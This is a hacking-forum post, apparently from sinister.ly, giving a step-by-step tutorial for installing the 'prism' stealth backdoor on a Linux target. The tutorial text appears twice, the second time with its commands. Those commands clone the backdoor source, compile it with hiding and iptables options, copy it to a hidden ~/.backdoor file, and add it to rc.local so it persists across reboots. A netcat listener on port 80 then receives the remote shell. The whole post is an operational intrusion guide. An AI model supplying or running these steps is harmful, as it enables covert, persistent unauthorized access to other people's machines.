Installing a persistent backdoor on Linux 05-23-2015, 09:30 PM
#1
Hello All,
Another simple tutorial on how to install a persistent backdoor onto a Linux machine.
Requirments:
git
build-essential or gcc
To begin let's download our backdoor source code:
Now cd into the newly created directory, edit prism.c with your favourite editor and your own variables.
Now let's build it for our target x64 machine:
Now let's copy it somewhere safe:
Easiest way to add this to start up is to edit the rc.local file and add the following:
Now on your local machine just type the following:
(80 is the port that you have set in prism.c.)
References:
https://github.com/andreafabrizi/prism
https://www.andreafabrizi.it/?prism
This is a user space stealth cross os backdoor that runs on Linux, Solaris, AIX, BSD/Mac & Android, you have to edit prism.c to meet your needs else it will fail to work as intended.
Enjoy :p
Another simple tutorial on how to install a persistent backdoor onto a Linux machine.
Requirments:
git
build-essential or gcc
To begin let's download our backdoor source code:
Code:
git clone https://github.com/andreafabrizi/prism.gitNow cd into the newly created directory, edit prism.c with your favourite editor and your own variables.
Now let's build it for our target x64 machine:
Code:
gcc -DSTATIC -DDETACH -DIPTABLES -Wall -s -o backdoor prism.cNow let's copy it somewhere safe:
Code:
cp backdoor ~/.backdoorEasiest way to add this to start up is to edit the rc.local file and add the following:
Code:
/home/USER/./.backdoorNow on your local machine just type the following:
Code:
nc -l -p 80References:
https://github.com/andreafabrizi/prism
https://www.andreafabrizi.it/?prism
This is a user space stealth cross os backdoor that runs on Linux, Solaris, AIX, BSD/Mac & Android, you have to edit prism.c to meet your needs else it will fail to work as intended.
Enjoy :p
Donate to CyphrXCloud BTC: 1JvN52pFLhicNPgvqXgEcdDzEP895wUTKa
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
















